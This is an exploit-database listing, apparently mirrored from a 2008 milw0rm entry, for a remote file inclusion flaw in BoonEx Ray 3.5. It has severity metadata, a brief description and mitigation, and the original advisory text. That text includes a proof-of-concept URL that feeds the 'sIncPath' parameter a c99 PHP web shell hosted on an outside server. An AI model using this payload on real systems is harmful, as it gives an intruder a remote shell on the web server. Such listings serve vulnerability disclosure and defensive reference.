header-logo
Suggest Exploit
vendor:
Ray
by:
RoMaNcYxHaCkEr
7.5
CVSS
HIGH
RFI
94
CWE
Product Name: Ray
Affected Version From: 3.5
Affected Version To: 3.5
Patch Exists: NO
Related CWE: N/A
CPE: a:boonex:ray:3.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Ray

The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'sIncPath' parameter in 'content.inc.php' script. This can be exploited to include arbitrary remote files containing malicious PHP code, which will be executed within the context of the vulnerable web server.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

# Name Of Script : Ray

# Version : 3.5

# Download From : http://get.boonex.com/Ray-v.3.5-Suite-Free

# Found By : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ]

# My Home Page : WwW.4RxH.CoM [ We Will Be Back Soon ] & Tryag.cc/cc [ Member From Tryag Forum ]

# Type Of Exploit : RFI

# POC : 

http://WwW.4RxH.CoM/ray.3.5/modules/global/inc/content.inc.php?sIncPath=http://rxh.freehostia.com/shells/c99in.txt?

# Greet To : Tryag TeaM ,Injector TeaM ,Unknown Hacker , aLwHeD

# Note : No One Perfect  :) 

# rXh

# bEST wISHES

# milw0rm.com [2008-07-08]

Navigation

Suggest Exploit

Services By CQR